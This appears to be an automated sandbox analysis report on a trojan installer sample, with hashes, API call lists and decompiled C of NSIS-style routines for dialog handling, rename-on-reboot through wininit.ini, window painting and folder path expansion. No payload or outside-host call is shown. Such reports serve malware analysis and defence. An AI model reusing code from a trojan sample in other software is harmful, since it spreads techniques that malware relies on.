            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
            • String ID: $M$N
            • API String ID: 2564846305-813528018
            • Opcode ID: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
            • Instruction ID: 1c888212402988323542b136e78769e30209d338b2ecbb40b03ff66d659fa363
            • Opcode Fuzzy Hash: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
            • Instruction Fuzzy Hash: 25027A70900609EFDB20DFA5CD85AAF7BB5FB85314F10812AF611BA2E1DB798951CF18
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 91%
            			E00404789(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
            				char _v8;
            				int _v12;
            				void* _v16;
            				struct HWND__* _t56;
            				signed int _t75;
            				signed short* _t76;
            				signed short* _t78;
            				long _t92;
            				int _t103;
            				signed int _t110;
            				intOrPtr _t113;
            				WCHAR* _t114;
            				signed int* _t116;
            				WCHAR* _t117;
            				struct HWND__* _t118;
            
            				if(_a8 != 0x110) {
            					if(_a8 != 0x111) {
            						L13:
            						if(_a8 != 0x4e) {
            							if(_a8 == 0x40b) {
            								 *0x79ff54 =  *0x79ff54 + 1;
            							}
            							L27:
            							_t114 = _a16;
            							L28:
            							return E00404631(_a8, _a12, _t114);
            						}
            						_t56 = GetDlgItem(_a4, 0x3e8);
            						_t114 = _a16;
            						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
            							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
            							_t113 =  *((intOrPtr*)(_t114 + 0x18));
            							_v12 = _t103;
            							_v16 = _t113;
            							_v8 = 0x7a6a40;
            							if(_t103 - _t113 < 0x800) {
            								SendMessageW(_t56, 0x44b, 0,  &_v16);
            								SetCursor(LoadCursorW(0, 0x7f02));
            								_push(1);
            								_t44 =  &_v8; // 0x7a6a40
            								E00404A38(_a4,  *_t44);
            								SetCursor(LoadCursorW(0, 0x7f00));
            								_t114 = _a16;
            							}
            						}
            						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
            							goto L28;
            						} else {
            							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
            								SendMessageW( *0x7a8aa8, 0x111, 1, 0);
            							}
            							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
            								SendMessageW( *0x7a8aa8, 0x10, 0, 0);
            							}
            							return 1;
            						}
            					}
            					if(_a12 >> 0x10 != 0 ||  *0x79ff54 != 0) {
            						goto L27;
            					} else {
            						_t116 =  *0x7a0f60 + 0x14;
            						if(( *_t116 & 0x00000020) == 0) {
            							goto L27;
            						}
            						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
            						E004045EC(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
            						E00404A14();
            						goto L13;
            					}
            				}
            				_t117 = _a16;
            				_t75 =  *(_t117 + 0x30);
            				if(_t75 < 0) {
            					_t75 =  *( *0x7a7a7c - 4 + _t75 * 4);
            				}
            				_t76 =  *0x7a8ad8 + _t75 * 2;
            				_t110 =  *_t76 & 0x0000ffff;
            				_a8 = _t110;
            				_t78 =  &(_t76[1]);
            				_a16 = _t78;
            				_v16 = _t78;
            				_v12 = 0;
            				_v8 = E0040473A;
            				if(_t110 != 2) {
            					_v8 = E00404700;
            				}
            				_push( *((intOrPtr*)(_t117 + 0x34)));
            				_push(0x22);
            				E004045CA(_a4);
            				_push( *((intOrPtr*)(_t117 + 0x38)));
            				_push(0x23);
            				E004045CA(_a4);
            				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
            				E004045EC( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
            				_t118 = GetDlgItem(_a4, 0x3e8);
            				E004045FF(_t118);
            				SendMessageW(_t118, 0x45b, 1, 0);
            				_t92 =  *( *0x7a8ab0 + 0x68);
            				if(_t92 < 0) {
            					_t92 = GetSysColor( ~_t92);
            				}
            				SendMessageW(_t118, 0x443, 0, _t92);
            				SendMessageW(_t118, 0x445, 0, 0x4010000);
            				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
            				 *0x79ff54 = 0;
            				SendMessageW(_t118, 0x449, _a8,  &_v16);
            				 *0x79ff54 = 0;
            				return 0;
            			}


















            0x0040479b
            0x004048c8
            0x00404925
            0x00404929
            0x004049f6
            0x004049f8
            0x004049f8
            0x004049fe
            0x004049fe
            0x00404a01
            0x00000000
            0x00404a08
            0x00404937
            0x0040493d
            0x00404947
            0x00404952
            0x00404955
            0x00404958
            0x00404963
            0x00404966
            0x0040496d
            0x0040497a
            0x0040498b
            0x00404991
            0x00404993
            0x00404999
            0x004049a7
            0x004049ad
            0x004049ad
            0x0040496d
            0x004049b7
            0x00000000
            0x004049c2
            0x004049c6
            0x004049d6
            0x004049d6
            0x004049dc
            0x004049e8
            0x004049e8
            0x00000000
            0x004049ec
            0x004049b7
            0x004048d3
            0x00000000
            0x004048e5
            0x004048ea
            0x004048f0
            0x00000000
            0x00000000
            0x00404919
            0x0040491b
            0x00404920
            0x00000000
            0x00404920
            0x004048d3
            0x004047a1
            0x004047a4
            0x004047a9
            0x004047ba
            0x004047ba
            0x004047c2
            0x004047c5
            0x004047c9
            0x004047cc
            0x004047d0
            0x004047d3
            0x004047d6
            0x004047d9
            0x004047e0
            0x004047e2
            0x004047e2
            0x004047ec
            0x004047f9
            0x00404803
            0x00404808
            0x0040480b
            0x00404810
            0x00404827
            0x0040482e
            0x00404841
            0x00404844
            0x00404858
            0x0040485f
            0x00404864
            0x00404869
            0x00404869
            0x00404877
            0x00404885
            0x00404897
            0x0040489c
            0x004048ac
            0x004048ae
            0x00000000

            APIs
            • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404827
            • GetDlgItem.USER32 ref: 0040483B
            • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404858
            • GetSysColor.USER32(?), ref: 00404869
            • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404877
            • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404885
            • lstrlenW.KERNEL32(?), ref: 0040488A
            • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404897
            • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048AC
            • GetDlgItem.USER32 ref: 00404905
            • SendMessageW.USER32(00000000), ref: 0040490C
            • GetDlgItem.USER32 ref: 00404937
            • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040497A
            • LoadCursorW.USER32(00000000,00007F02), ref: 00404988
            • SetCursor.USER32(00000000), ref: 0040498B
            • LoadCursorW.USER32(00000000,00007F00), ref: 004049A4
            • SetCursor.USER32(00000000), ref: 004049A7
            • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D6
            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E8
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
            • String ID: @jz$N
            • API String ID: 3103080414-4087404676
            • Opcode ID: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
            • Instruction ID: a92c684f90d09e790cb96c84d129e3e4002e0b0c6609d0ca9bf02dd30757374c
            • Opcode Fuzzy Hash: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
            • Instruction Fuzzy Hash: D861A2B1900209BFDB109F61DD85AAA7BA9FB85315F00803AF705B62E1C77C9D51DF98
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004062B4(void* __ecx) {
            				void* __ebx;
            				void* __edi;
            				void* __esi;
            				long _t12;
            				long _t24;
            				char* _t31;
            				int _t37;
            				void* _t38;
            				intOrPtr* _t39;
            				long _t42;
            				WCHAR* _t44;
            				void* _t46;
            				void* _t48;
            				void* _t49;
            				void* _t52;
            				void* _t53;
            
            				_t38 = __ecx;
            				_t44 =  *(_t52 + 0x14);
            				 *0x7a5628 = 0x55004e;
            				 *0x7a562c = 0x4c;
            				if(_t44 == 0) {
            					L3:
            					_t2 = _t52 + 0x1c; // 0x7a5e28
            					_t12 = GetShortPathNameW( *_t2, 0x7a5e28, 0x400);
            					if(_t12 != 0 && _t12 <= 0x400) {
            						_t37 = wsprintfA(0x7a5228, "%ls=%ls\r\n", 0x7a5628, 0x7a5e28);
            						_t53 = _t52 + 0x10;
            						E004066AB(_t37, 0x400, 0x7a5e28, 0x7a5e28,  *((intOrPtr*)( *0x7a8ab0 + 0x128)));
            						_t12 = E0040615E(0x7a5e28, 0xc0000000, 4);
            						_t48 = _t12;
            						 *(_t53 + 0x18) = _t48;
            						if(_t48 != 0xffffffff) {
            							_t42 = GetFileSize(_t48, 0);
            							_t6 = _t37 + 0xa; // 0xa
            							_t46 = GlobalAlloc(0x40, _t42 + _t6);
            							if(_t46 == 0 || E004061E1(_t48, _t46, _t42) == 0) {
            								L18:
            								return CloseHandle(_t48);
            							} else {
            								if(E004060C3(_t38, _t46, "[Rename]\r\n") != 0) {
            									_t49 = E004060C3(_t38, _t21 + 0xa, "\n[");
            									if(_t49 == 0) {
            										_t48 =  *(_t53 + 0x18);
            										L16:
            										_t24 = _t42;
            										L17:
            										E00406119(_t24 + _t46, 0x7a5228, _t37);
            										SetFilePointer(_t48, 0, 0, 0);
            										E00406210(_t48, _t46, _t42 + _t37);
            										GlobalFree(_t46);
            										goto L18;
            									}
            									_t39 = _t46 + _t42;
            									_t31 = _t39 + _t37;
            									while(_t39 > _t49) {
            										 *_t31 =  *_t39;
            										_t31 = _t31 - 1;
            										_t39 = _t39 - 1;
            									}
            									_t24 = _t49 - _t46 + 1;
            									_t48 =  *(_t53 + 0x18);
            									goto L17;
            								}
            								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
            								_t42 = _t42 + 0xa;
            								goto L16;
            							}
            						}
            					}
            				} else {
            					CloseHandle(E0040615E(_t44, 0, 1));
            					_t12 = GetShortPathNameW(_t44, 0x7a5628, 0x400);
            					if(_t12 != 0 && _t12 <= 0x400) {
            						goto L3;
            					}
            				}
            				return _t12;
            			}



















            0x004062b4
            0x004062bd
            0x004062c4
            0x004062ce
            0x004062e2
            0x0040630a
            0x00406311
            0x00406315
            0x00406319
            0x00406339
            0x00406340
            0x0040634a
            0x00406357
            0x0040635c
            0x00406361
            0x00406365
            0x00406374
            0x00406376
            0x00406383
            0x00406387
            0x00406422
            0x00000000
            0x0040639d
            0x004063aa
            0x004063ce
            0x004063d2
            0x004063f1
            0x004063f5
            0x004063f5
            0x004063f7
            0x00406400
            0x0040640b
            0x00406416
            0x0040641c
            0x00000000
            0x0040641c
            0x004063d4
            0x004063d7
            0x004063e2
            0x004063de
            0x004063e0
            0x004063e1
            0x004063e1
            0x004063e9
            0x004063eb
            0x00000000
            0x004063eb
            0x004063b5
            0x004063bb
            0x00000000
            0x004063bb
            0x00406387
            0x00406365
            0x004062e4
            0x004062ef
            0x004062f8
            0x004062fc
            0x00000000
            0x00000000
            0x004062fc
            0x0040642d

            APIs
            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,0040644F,?,?), ref: 004062EF
            • GetShortPathNameW.KERNEL32 ref: 004062F8
              • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
              • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
            • GetShortPathNameW.KERNEL32 ref: 00406315
            • wsprintfA.USER32 ref: 00406333
            • GetFileSize.KERNEL32(00000000,00000000,007A5E28,C0000000,00000004,007A5E28,?,?,?,?,?), ref: 0040636E
            • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040637D
            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063B5
            • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,007A5228,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040640B
            • GlobalFree.KERNEL32 ref: 0040641C
            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00406423
              • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\SecuriteInfo.com.Trojan.NSISX.Spy.Gen.2.8452.exe,80000000,00000003), ref: 00406162
              • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
            • String ID: %ls=%ls$(Vz$(^z$(^z$[Rename]
            • API String ID: 2171350718-2000197835
            • Opcode ID: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
            • Instruction ID: 6cadb61bc7003589c9facc341004653e1fa6c0793f9c109ef5d6a16b2289e69d
            • Opcode Fuzzy Hash: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
            • Instruction Fuzzy Hash: 2D313571600705BBD2206B669D48F1B3A9CEF85714F16003EFD42FA2C2DA7DD82586BD
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 90%
            			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
            				struct tagLOGBRUSH _v16;
            				struct tagRECT _v32;
            				struct tagPAINTSTRUCT _v96;
            				struct HDC__* _t70;
            				struct HBRUSH__* _t87;
            				struct HFONT__* _t94;
            				long _t102;
            				signed int _t126;
            				struct HDC__* _t128;
            				intOrPtr _t130;
            
            				if(_a8 == 0xf) {
            					_t130 =  *0x7a8ab0;
            					_t70 = BeginPaint(_a4,  &_v96);
            					_v16.lbStyle = _v16.lbStyle & 0x00000000;
            					_a8 = _t70;
            					GetClientRect(_a4,  &_v32);
            					_t126 = _v32.bottom;
            					_v32.bottom = _v32.bottom & 0x00000000;
            					while(_v32.top < _t126) {
            						_a12 = _t126 - _v32.top;
            						asm("cdq");
            						asm("cdq");
            						asm("cdq");
            						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
            						_t87 = CreateBrushIndirect( &_v16);
            						_v32.bottom = _v32.bottom + 4;
            						_a16 = _t87;
            						FillRect(_a8,  &_v32, _t87);
            						DeleteObject(_a16);
            						_v32.top = _v32.top + 4;
            					}
            					if( *(_t130 + 0x58) != 0xffffffff) {
            						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
            						_a16 = _t94;
            						if(_t94 != 0) {
            							_t128 = _a8;
            							_v32.left = 0x10;
            							_v32.top = 8;
            							SetBkMode(_t128, 1);
            							SetTextColor(_t128,  *(_t130 + 0x58));
            							_a8 = SelectObject(_t128, _a16);
            							DrawTextW(_t128, 0x7a7aa0, 0xffffffff,  &_v32, 0x820);
            							SelectObject(_t128, _a8);
            							DeleteObject(_a16);
            						}
            					}
            					EndPaint(_a4,  &_v96);
            					return 0;
            				}
            				_t102 = _a16;
            				if(_a8 == 0x46) {
            					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
            					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8aa8;
            				}
            				return DefWindowProcW(_a4, _a8, _a12, _t102);
            			}













            0x0040100a
            0x00401039
            0x00401047
            0x0040104d
            0x00401051
            0x0040105b
            0x00401061
            0x00401064
            0x004010f3
            0x00401089
            0x0040108c
            0x004010a6
            0x004010bd
            0x004010cc
            0x004010cf
            0x004010d5
            0x004010d9
            0x004010e4
            0x004010ed
            0x004010ef
            0x004010ef
            0x00401100
            0x00401105
            0x0040110d
            0x00401110
            0x00401112
            0x00401118
            0x0040111f
            0x00401126
            0x00401130
            0x00401142
            0x00401156
            0x00401160
            0x00401165
            0x00401165
            0x00401110
            0x0040116e
            0x00000000
            0x00401178
            0x00401010
            0x00401013
            0x00401015
            0x0040101f
            0x0040101f
            0x00000000

            APIs
            • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
            • BeginPaint.USER32(?,?), ref: 00401047
            • GetClientRect.USER32 ref: 0040105B
            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
            • FillRect.USER32 ref: 004010E4
            • DeleteObject.GDI32(?), ref: 004010ED
            • CreateFontIndirectW.GDI32(?), ref: 00401105
            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
            • SelectObject.GDI32(00000000,?), ref: 00401140
            • DrawTextW.USER32(00000000,007A7AA0,000000FF,00000010,00000820), ref: 00401156
            • SelectObject.GDI32(00000000,00000000), ref: 00401160
            • DeleteObject.GDI32(?), ref: 00401165
            • EndPaint.USER32(?,?), ref: 0040116E
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.242506590.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.242502803.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242513299.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242517689.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242521683.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242769016.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242777565.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242784373.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242790346.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242830214.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242835324.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.242841112.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
            Similarity
            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
            • String ID: F
            • API String ID: 941294808-1304234792
            • Opcode ID: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
            • Instruction ID: 97a6e5849d711934decb320d9e1447055a7c39d586dd296ee09aa65e352ff849
            • Opcode Fuzzy Hash: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
            • Instruction Fuzzy Hash: 83418C71800209AFCF058F95CE459AF7BB9FF45315F00802AF991AA1A0CB389A55DFA4
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 72%
            			E004066AB(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
            				struct _ITEMIDLIST* _v8;
            				signed int _v12;
            				signed int _v16;
            				signed int _v20;
            				signed int _v24;
            				signed int _v28;
            				signed int _t44;
            				WCHAR* _t45;
            				signed char _t47;
            				signed int _t48;
            				short _t59;
            				short _t61;
            				short _t63;
            				void* _t71;
            				signed int _t77;
            				signed int _t78;
            				short _t81;
            				short _t82;
            				signed char _t84;
            				signed int _t85;
            				void* _t98;
            				void* _t104;
            				intOrPtr* _t105;
            				void* _t107;
            				WCHAR* _t108;
            				void* _t110;
            
            				_t107 = __esi;
            				_t104 = __edi;
            				_t71 = __ebx;
            				_t44 = _a8;
            				if(_t44 < 0) {
            					_t44 =  *( *0x7a7a7c - 4 + _t44 * 4);
            				}
            				_push(_t71);
            				_push(_t107);
            				_push(_t104);
            				_t105 =  *0x7a8ad8 + _t44 * 2;
            				_t45 = 0x7a6a40;
            				_t108 = 0x7a6a40;
            				if(_a4 >= 0x7a6a40 && _a4 - 0x7a6a40 >> 1 < 0x800) {
            					_t108 = _a4;
            					_a4 = _a4 & 0x00000000;
            				}
            				_t81 =  *_t105;
            				_a8 = _t81;
            				if(_t81 == 0) {
            					L43:
            					 *_t108 =  *_t108 & 0x00000000;
            					if(_a4 == 0) {
            						return _t45;
            					}
            					return E0040666E(_a4, _t45);
            				} else {
            					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
            						_t98 = 2;
            						_t105 = _t105 + _t98;
            						if(_t81 >= 4) {
            							if(__eflags != 0) {
            								 *_t108 = _t81;
            								_t108 = _t108 + _t98;
            								__eflags = _t108;
            							} else {
            								 *_t108 =  *_t105;
            								_t108 = _t108 + _t98;
            								_t105 = _t105 + _t98;
            							}
            							L42:
            							_t82 =  *_t105;
            							_a8 = _t82;
            							if(_t82 != 0) {
            								_t81 = _a8;
            								continue;
            							}
            							goto L43;
            						}
            						_t84 =  *((intOrPtr*)(_t105 + 1));
            						_t47 =  *_t105;
            						_t48 = _t47 & 0x000000ff;
            						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
            						_t85 = _t84 & 0x000000ff;
            						_v28 = _t48 | 0x00008000;
            						_t77 = 2;
            						_v16 = _t85;
            						_t105 = _t105 + _t77;
            						_v24 = _t48;
            						_v20 = _t85 | 0x00008000;
            						if(_a8 != _t77) {
            							__eflags = _a8 - 3;
            							if(_a8 != 3) {
            								__eflags = _a8 - 1;
            								if(__eflags == 0) {
            									__eflags = (_t48 | 0xffffffff) - _v12;
            									E004066AB(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
            								}
            								L38:
            								_t108 =  &(_t108[lstrlenW(_t108)]);
            								_t45 = 0x7a6a40;
            								goto L42;
            							}
            							_t78 = _v12;
            							__eflags = _t78 - 0x1d;
            							if(_t78 != 0x1d) {
            								__eflags = (_t78 << 0xb) + 0x7a9000;
            								E0040666E(_t108, (_t78 << 0xb) + 0x7a9000);
            							} else {
            								E004065B5(_t108,  *0x7a8aa8);
            							}
            							__eflags = _t78 + 0xffffffeb - 7;
            							if(__eflags < 0) {
            								L29:
            								E004068F5(_t108);
            							}
            							goto L38;
            						}
            						if( *0x7a8b24 != 0) {
            							_t77 = 4;
            						}
            						_t121 = _t48;
            						if(_t48 >= 0) {
            							__eflags = _t48 - 0x25;
            							if(_t48 != 0x25) {
            								__eflags = _t48 - 0x24;
            								if(_t48 == 0x24) {
            									GetWindowsDirectoryW(_t108, 0x400);
            									_t77 = 0;
            								}
            								while(1) {
            									__eflags = _t77;
            									if(_t77 == 0) {
            										goto L26;
            									}
            									_t59 =  *0x7a8aa4;
            									_t77 = _t77 - 1;
            									__eflags = _t59;
            									if(_t59 == 0) {
            										L22:
            										_t61 = SHGetSpecialFolderLocation( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
            										__eflags = _t61;
            										if(_t61 != 0) {
            											L24:
            											 *_t108 =  *_t108 & 0x00000000;
            											__eflags =  *_t108;
            											continue;
            										}
            										__imp__SHGetPathFromIDListW(_v8, _t108);
            										_a8 = _t61;
            										__imp__CoTaskMemFree(_v8);
            										__eflags = _a8;
            										if(_a8 != 0) {
            											goto L26;
            										}
            										goto L24;
            									}
            									_t63 =  *_t59( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
            									__eflags = _t63;
            									if(_t63 == 0) {
            										goto L26;
            									}
            									goto L22;
            								}
            								goto L26;
            							}
            							GetSystemDirectoryW(_t108, 0x400);
            							goto L26;
            						} else {
            							E0040653C( *0x7a8ad8, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8ad8 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
            							if( *_t108 != 0) {
            								L27:
            								if(_v16 == 0x1a) {
            									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
            								}
            								goto L29;
            							}
            							E004066AB(_t77, _t105, _t108, _t108, _v16);
            							L26:
            							if( *_t108 == 0) {
            								goto L29;
            							}
            							goto L27;
            						}
            					}
            					goto L43;
            				}
            			}





























            0x004066ab
            0x004066ab
            0x004066ab
            0x004066b1
            0x004066b6
            0x004066c7
            0x004066c7
            0x004066cf
            0x004066d0
            0x004066d1
            0x004066d2
            0x004066d5
            0x004066dd
            0x004066df
            0x004066f0
            0x004066f3
            0x004066f3
            0x004066f7
            0x004066fd
            0x00406700
            0x004068db
            0x004068db
            0x004068e6
            0x004068f2
            0x004068f2
            0x00000000
            0x00406706
            0x0040670b
            0x00406720
            0x00406721
            0x00406727
            0x004068b9
            0x004068c7
            0x004068ca
            0x004068ca
            0x004068bb
            0x004068be
            0x004068c1
            0x004068c3
            0x004068c3
            0x004068cc
            0x004068cc
            0x004068d2
            0x004068d5
            0x00406708
            0x00000000
            0x00406708
            0x00000000
            0x004068d5
            0x0040672d
            0x00406730
            0x0040673f
            0x00406746
            0x00406752
            0x00406755
            0x00406758
            0x00406759
            0x0040675e
            0x00406764
            0x00406767
            0x0040676a
            0x0040685d
            0x00406862
            0x00406895
            0x0040689a
            0x0040689f
            0x004068a4
            0x004068a4
            0x004068a9
            0x004068af
            0x004068b2
            0x00000000
            0x004068b2
            0x00406864
            0x00406867
            0x0040686a
            0x0040687f
            0x00406886
            0x0040686c
            0x00406873
            0x00406873
            0x0040688e
            0x00406891
            0x00406855
            0x00406856
            0x00406856
            0x00000000
            0x00406891
            0x00406777
            0x0040677b
            0x0040677b
            0x0040677c
            0x0040677e
            0x004067bb
            0x004067be
            0x004067ce
            0x004067d1
            0x004067d9
            0x004067df
            0x004067df
            0x0040683a
            0x0040683a
            0x0040683c
            0x00000000
            0x00000000
            0x004067e3
            0x004067e8
            0x004067e9
            0x004067eb
            0x00406802
            0x00406810
            0x00406816
            0x00406818
            0x00406836
            0x00406836
            0x00406836
            0x00000000
            0x00406836
            0x0040681e
            0x00406827
            0x0040682a
            0x00406830
            0x00406834
            0x00000000
            0x00000000
            0x00000000
            0x00406834
            0x004067fc
            0x004067fe
            0x00406800
            0x00000000
            0x00000000
            0x00000000
            0x00406800
            0x00000000
            0x0040683a
